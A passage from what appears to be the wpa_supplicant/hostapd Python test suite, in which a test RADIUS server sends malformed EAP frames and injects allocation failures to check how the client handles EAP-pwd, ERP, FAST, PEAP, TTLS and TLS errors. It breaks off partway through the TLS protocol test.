with alloc_fail(dev[0], i, "eap_msg_alloc;=eap_pwd_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password", fragment_size="50",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
# No password configured
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=52"],
timeout=15)
if ev is None:
raise Exception("EAP-pwd not started")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1,
"hash_nt_password_hash;eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd-hash",
password_hex="hash:e3718ece8ab74792cbbfffd316d2d19a",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure reported")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
"rsn_pairwise": "CCMP", "ieee8021x": "1",
"eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
"pwd_group": "19", "fragment_size": "40" }
hostapd.add_ap(apdev[1]['ifname'], params)
with alloc_fail(dev[0], 1, "wpabuf_alloc;=eap_pwd_process"):
dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_erp(dev, apdev):
"""ERP protocol tests"""
check_erp_capa(dev[0])
global eap_proto_erp_test_done
eap_proto_erp_test_done = False
def erp_handler(ctx, req):
logger.info("erp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type")
return struct.pack(">BBH", EAP_CODE_INITIATE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Reserved field")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH_START)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Zero-length TVs/TLVs")
payload = ""
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV")
payload = struct.pack("B", 191)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV")
payload = struct.pack("BB", 191, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Ignored unknown TLV and unknown TV/TLV terminating parsing")
payload = struct.pack("BBB", 191, 0, 192)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: More than one keyName-NAI")
payload = struct.pack("BBBB", EAP_ERP_TLV_KEYNAME_NAI, 0,
EAP_ERP_TLV_KEYNAME_NAI, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV keyName-NAI")
payload = struct.pack("B", EAP_ERP_TLV_KEYNAME_NAI)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV keyName-NAI")
payload = struct.pack("BB", EAP_ERP_TLV_KEYNAME_NAI, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid rRK lifetime TV followed by too short rMSK lifetime TV")
payload = struct.pack(">BLBH", EAP_ERP_TV_RRK_LIFETIME, 0,
EAP_ERP_TV_RMSK_LIFETIME, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type (Finish)")
return struct.pack(">BBH", EAP_CODE_FINISH, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing fields (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SEQ (Finish)")
return struct.pack(">BBHBBHB", EAP_CODE_FINISH, ctx['id'],
4 + 1 + 4,
EAP_ERP_TYPE_REAUTH, 0, 0xffff, 0)
logger.info("No more test responses available - test case completed")
global eap_proto_erp_test_done
eap_proto_erp_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(erp_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_erp_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_fast_errors(dev, apdev):
"""EAP-FAST local error cases"""
check_eap_capa(dev[0], "FAST")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_fast_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "wpabuf_alloc;eap_fast_tlv_eap_payload"),
(1, "eap_fast_derive_key;eap_fast_derive_key_auth"),
(1, "eap_msg_alloc;eap_peer_tls_phase2_nak"),
(1, "wpabuf_alloc;eap_fast_tlv_result"),
(1, "wpabuf_alloc;eap_fast_tlv_pac_ack"),
(1, "=eap_peer_tls_derive_session_id;eap_fast_process_crypto_binding"),
(1, "eap_peer_tls_decrypt;eap_fast_decrypt"),
(1, "eap_fast_getKey"),
(1, "eap_fast_get_session_id"),
(1, "eap_fast_get_emsk") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_auth_errors ")
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_fast_derive_key;eap_fast_derive_key_provisioning"),
(1, "eap_mschapv2_getKey;eap_fast_get_phase2_key"),
(1, "=eap_fast_use_pac_opaque"),
(1, "eap_fast_copy_buf"),
(1, "=eap_fast_add_pac"),
(1, "=eap_fast_init_pac_data"),
(1, "=eap_fast_write_pac"),
(2, "=eap_fast_write_pac") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_errors ")
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_fast_get_cmk;eap_fast_process_crypto_binding"),
(1, "eap_fast_derive_eap_msk;eap_fast_process_crypto_binding"),
(1, "eap_fast_derive_eap_emsk;eap_fast_process_crypto_binding") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_auth_errors ")
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].request("SET blob fast_pac_errors ")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
# EAP-FAST: Only EAP-MSCHAPv2 is allowed during unauthenticated
# provisioning; reject phase2 type 6
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Wrong password in Phase 2")
dev[0].request("SET blob fast_pac_errors ")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="wrong password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "FOOBAR\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nFOOBAR\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nSTART\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Type=12345\nEND\n"
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=12\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1q\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Opaque=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nI-ID=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID-Info=1\nEND\n" ]
for pac in tests:
blob = binascii.hexlify(pac)
dev[0].request("SET blob fast_pac_errors " + blob)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\nSTART\nEND\nSTART\nEND\n" ]
for pac in tests:
blob = binascii.hexlify(pac)
dev[0].request("SET blob fast_pac_errors " + blob)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_errors")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].request("SET blob fast_pac_errors ")
def test_eap_proto_peap_errors(dev, apdev):
"""EAP-PEAP local error cases"""
check_eap_capa(dev[0], "PEAP")
check_eap_capa(dev[0], "MSCHAPV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_peap_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_mschapv2_getKey;eap_peap_get_isk;eap_peap_derive_cmk"),
(1, "eap_msg_alloc;eap_tlv_build_result"),
(1, "eap_mschapv2_init;eap_peap_phase2_request"),
(1, "eap_peer_tls_decrypt;eap_peap_decrypt"),
(1, "wpabuf_alloc;=eap_peap_decrypt"),
(1, "eap_peer_tls_encrypt;eap_peap_decrypt"),
(1, "eap_peer_tls_process_helper;eap_peap_process"),
(1, "eap_peer_tls_derive_key;eap_peap_process"),
(1, "eap_peer_tls_derive_session_id;eap_peap_process"),
(1, "eap_peap_getKey"),
(1, "eap_peap_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
phase1="peapver=0 crypto_binding=2",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "peap_prfplus;eap_peap_derive_cmk"),
(1, "eap_tlv_add_cryptobinding;eap_tlv_build_result"),
(1, "peap_prfplus;eap_peap_getKey") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
phase1="peapver=0 crypto_binding=2",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1,
"eap_peer_tls_phase2_nak;eap_peap_phase2_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="cert user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_ttls_errors(dev, apdev):
"""EAP-TTLS local error cases"""
check_eap_capa(dev[0], "TTLS")
check_eap_capa(dev[0], "MSCHAPV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_ttls_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="user", password="password",
ca_cert="auth_serv/ca.pem",
phase2="autheap=MSCHAPV2",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_peer_tls_derive_key;eap_ttls_v0_derive_key",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_derive_session_id;eap_ttls_v0_derive_key",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_mschapv2",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschapv2",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_implicit_identity_request",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_decrypt;eap_ttls_decrypt",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_getKey",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_get_session_id",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_get_emsk",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_mschap",
"mschap user", "auth=MSCHAP"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschap",
"mschap user", "auth=MSCHAP"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_chap",
"chap user", "auth=CHAP"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_chap",
"chap user", "auth=CHAP"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_pap",
"pap user", "auth=PAP"),
(1, "wpabuf_alloc;eap_ttls_avp_encapsulate",
"user", "autheap=MSCHAPV2"),
(1, "eap_mschapv2_init;eap_ttls_phase2_request_eap_method",
"user", "autheap=MSCHAPV2"),
(1, "eap_sm_buildIdentity;eap_ttls_phase2_request_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_avp_encapsulate;eap_ttls_phase2_request_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_parse_attr_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_process_decrypted",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_fake_identity_request",
"user", "autheap=MSCHAPV2"),
(1, "eap_msg_alloc;eap_tls_process_output",
"user", "autheap=MSCHAPV2"),
(1, "eap_msg_alloc;eap_peer_tls_build_ack",
"user", "autheap=MSCHAPV2"),
(1, "tls_connection_decrypt;eap_peer_tls_decrypt",
"user", "autheap=MSCHAPV2"),
(1, "eap_peer_tls_phase2_nak;eap_ttls_phase2_request_eap_method",
"cert user", "autheap=MSCHAPV2") ]
for count, func, identity, phase2 in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity=identity, password="password",
ca_cert="auth_serv/ca.pem", phase2=phase2,
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
note="Allocation failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_ttls_phase2_request_mschapv2"),
(1, "mschapv2_derive_response;eap_ttls_phase2_request_mschapv2") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="DOMAIN\mschapv2 user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="Test failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_expanded(dev, apdev):
"""EAP protocol tests with expanded header"""
global eap_proto_expanded_test_done
eap_proto_expanded_test_done = False
def expanded_handler(ctx, req):
logger.info("expanded_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge in expanded header")
return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 3,
EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded EAP length")
return struct.pack(">BBHB3BH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded frame type")
return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MD5)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MSCHAPv2 Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded frame type")
return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MSCHAPV2)
logger.info("No more test responses available - test case completed")
global eap_proto_expanded_test_done
eap_proto_expanded_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(expanded_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_expanded_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
if i == 4:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password",
wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 1 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
elif i in [ 2, 3 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP proposed method")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_tls(dev, apdev):
"""EAP-TLS protocol tests"""
check_eap_capa(dev[0], "TLS")
global eap_proto_tls_test_done, eap_proto_tls_test_wait
eap_proto_tls_test_done = False
eap_proto_tls_test_wait = False
def tls_handler(ctx, req):
logger.info("tls_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_tls_test_wait
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too much payload in TLS/Start: TLS Message Length (0 bytes) smaller than this fragment (1 bytes)")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xa0, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS/Start")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xe0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragment of TLS/Start: Invalid reassembly state: tls_in_left=2 tls_in_len=0 in_len=0")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TLS, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TLS message: no Flags octet included + workaround")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TLS)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragment of TLS message: more data than TLS message length indicated")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TLS, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS/Start and truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_TLS, 0xe0, 1, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
